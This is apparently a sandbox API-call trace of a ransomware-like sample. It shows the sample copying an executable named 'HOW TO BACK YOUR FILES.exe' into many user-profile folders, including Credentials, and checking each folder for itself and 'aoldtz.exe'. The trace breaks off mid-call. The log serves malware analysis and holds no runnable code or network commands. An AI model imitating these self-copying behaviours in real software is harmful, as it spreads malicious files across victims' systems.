[0065.832] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0065.832] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.832] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds cache\\kqmhsvkd\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.833] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.833] GetLastError () returned 0x0 [0065.833] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.833] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.833] CloseHandle (hObject=0x154) returned 1 [0065.833] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.833] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5872b1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5872b1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.833] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.833] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.834] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0065.834] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0065.834] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.834] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds cache\\d68g7bij\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.834] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.834] GetLastError () returned 0x0 [0065.834] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.834] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.835] CloseHandle (hObject=0x154) returned 1 [0065.835] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.835] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58777480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58777480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.835] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.835] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.835] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0065.835] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0065.835] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.835] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds cache\\6asvn7j7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.836] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.836] GetLastError () returned 0x0 [0065.836] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.836] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.836] CloseHandle (hObject=0x154) returned 1 [0065.836] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.836] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x587c3740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x587c3740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.836] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.836] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.836] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0065.837] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0065.837] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.837] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds cache\\1nbur4hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.837] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.837] GetLastError () returned 0x0 [0065.837] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.837] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.837] CloseHandle (hObject=0x154) returned 1 [0065.838] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.838] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5880fa00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5880fa00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.838] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.838] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.838] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" [0065.838] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" [0065.838] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.838] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.839] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.839] GetLastError () returned 0x0 [0065.839] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.839] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.839] CloseHandle (hObject=0x154) returned 1 [0065.839] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.839] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5880fa00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5880fa00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.839] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.839] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.839] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0065.839] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0065.839] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.840] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.840] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.840] GetLastError () returned 0x0 [0065.840] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.840] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.840] CloseHandle (hObject=0x154) returned 1 [0065.840] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.841] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.841] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.841] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.841] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0065.841] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0065.842] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.842] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.842] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.842] GetLastError () returned 0x0 [0065.842] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.842] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.843] CloseHandle (hObject=0x154) returned 1 [0065.843] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.843] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58881e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58881e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.843] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.843] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.843] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0065.843] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0065.843] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.843] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds\\microsoft feeds~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.844] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.844] GetLastError () returned 0x0 [0065.844] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.844] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.844] CloseHandle (hObject=0x154) returned 1 [0065.844] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.844] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58940500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58940500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.844] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.844] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.844] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" [0065.845] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" [0065.845] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.845] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\credentials\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.845] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.845] GetLastError 